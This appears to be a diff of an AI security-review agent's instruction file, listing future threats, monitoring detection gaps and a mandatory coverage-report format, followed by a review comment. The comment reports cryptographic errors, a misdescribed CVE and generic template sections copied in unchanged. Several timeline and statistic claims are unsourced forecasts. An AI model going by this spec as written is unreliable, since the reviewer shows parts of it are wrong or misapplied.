151
|
+
|
|
152
|
+
Threats materialising in the 2025–2030 window that defences designed today must account for.
|
|
153
|
+
|
|
154
|
+
| Threat | Est. Timeline | Relevance to This Domain | Prepare Now By |
|
|
155
|
+
|--------|--------------|--------------------------|----------------|
|
|
156
|
+
| Cryptographically Relevant Quantum Computer (CRQC) | 2028–2032 | Harvest-now-decrypt-later attacks active today; RSA/ECDSA keys signed today will be broken | Inventory all RSA/ECDSA usage; migrate long-lived data to ML-KEM (FIPS 203) |
|
|
157
|
+
| AI-assisted adversaries at scale | 2025–2027 (active) | LLM-powered fuzzing finds 10× more edge cases; automated PoC generation | Assume attackers have LLM help; expand test surface to match |
|
|
158
|
+
| EU AI Act full enforcement | 2026 | High-risk AI systems require mandatory conformity assessments | Classify all AI features against AI Act tiers now |
|
|
159
|
+
| Post-quantum TLS migration deadline | 2028–2030 | Browser vendors will drop classical-only TLS connections | Begin TLS agility assessment; test hybrid key exchange |
|
|
160
|
+
| Mandatory SBOM + build provenance (US EO 14028 / EU CRA) | 2025–2026 (active) | SBOM and SLSA attestation are becoming legally required | Achieve SLSA L2 minimum; generate CycloneDX SBOM per release |
|
|
161
|
+
|
|
162
|
+
## §DETECTION-GAP
|
|
163
|
+
|
|
164
|
+
What current security monitoring CANNOT detect in this domain, and what to build to close each gap.
|
|
165
|
+
|
|
166
|
+
**Standard gaps that MUST be checked:**
|
|
167
|
+
|
|
168
|
+
- **Second-order attack execution**: The storage request looks safe; only the retrieval+execution step is dangerous. Need: correlate write events with downstream read+execute events in the same SIEM query window.
|
|
169
|
+
- **Timing-side-channel leakage**: No log event emitted; only observable as microsecond response-time variance. Need: per-endpoint p99 latency tracking with statistical anomaly detection.
|
|
170
|
+
- **Low-and-slow credential stuffing**: Individually, each request is under rate limits. Need: behavioural baseline — flag accounts with geographically impossible velocity or device-fingerprint mismatch across authentication attempts.
|
|
171
|
+
- **Insider exfiltration via legitimate process**: Authorised exports, reports, and data downloads that individually are permitted but collectively constitute data exfiltration. Need: data-volume anomaly detection — alert when a single user's data access volume exceeds 3× their 30-day baseline within 24 hours.
|
|
172
|
+
- **Cross-agent attack chains**: Phase 1 finding A + Phase 1 finding B = CRITICAL chain invisible to either agent alone. Need: CISO orchestrator Phase 1 synthesis step — correlate all agent findings before Phase 2.
|
|
173
|
+
|
|
174
|
+
## §ZERO-MISS-MANDATE
|
|
175
|
+
|
|
176
|
+
This agent CANNOT declare any attack class clean without explicit evidence of checking. For each item, output one of:
|
|
177
|
+
- `CHECKED: [N files] | [patterns used] | CLEAN`
|
|
178
|
+
- `CHECKED: [N files] | [patterns used] | [N findings, all fixed]`
|
|
179
|
+
- `SKIPPED: [reason — must be "not applicable: [evidence]"]`
|
|
180
|
+
|
|
181
|
+
**Silent skip = FAILED COVERAGE.** The orchestrator flags this as a quality gap.
|
|
182
|
+
|
|
183
|
+
The output findings JSON MUST include a `coverageManifest` key:
|
|
184
|
+
```json
|
|
185
|
+
{
|
|
186
|
+
"coverageManifest": {
|
|
187
|
+
"attackClassesCovered": [{ "class": "SQL Injection", "filesReviewed": 47, "patterns": ["queryRaw", "string concat"], "result": "CLEAN" }],
|
|
188
|
+
"filesReviewed": 47,
|
|
189
|
+
"negativeAssertions": ["SQL Injection: queryRaw pattern searched across 47 files — 0 matches"],
|
|
190
|
+
"uncoveredReason": {}
|
|
191
|
+
}
|
|
192
|
+
}
|
|
193
|
+
```
|
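Review bot: the "Post-quantum threat" bullet in BEYOND SKILL.MD is internally inconsistent. HMAC-SHA1 and HMAC-SHA256 are symmetric MACs; a CRQC does not break them (Grover's algorithm at most halves the effective key length), so harvest-now-forge-later applies only to the RSA or ECDSA signatures over audit bundles. The proposed target Ed448 is an elliptic-curve scheme that Shor's algorithm breaks exactly as it breaks RSA, so it cannot be offered as a post-quantum alternative; keep ML-DSA (FIPS 204), drop Ed448, and reword the sentence so the risk is signature forgery rather than MAC recovery. The CVE-2023-36664 bullet describes a "log path" injection, but that CVE is Ghostscript's missing permission check on `%pipe%` device paths, which enables command execution while rendering PostScript and has no connection to log file configuration; replace it with a sourced example or drop it. Finally, the §EDGE-CASE-MATRIX, §TEMPORAL-THREATS, §DETECTION-GAP and coverageManifest blocks here repeat the generic SQL injection / XSS template verbatim from the earlier agent file instead of the logging-specific cases listed just above them (log injection, rotation race, logging-agent kill); tailor them, otherwise the agent's mandatory checks do not cover its own domain.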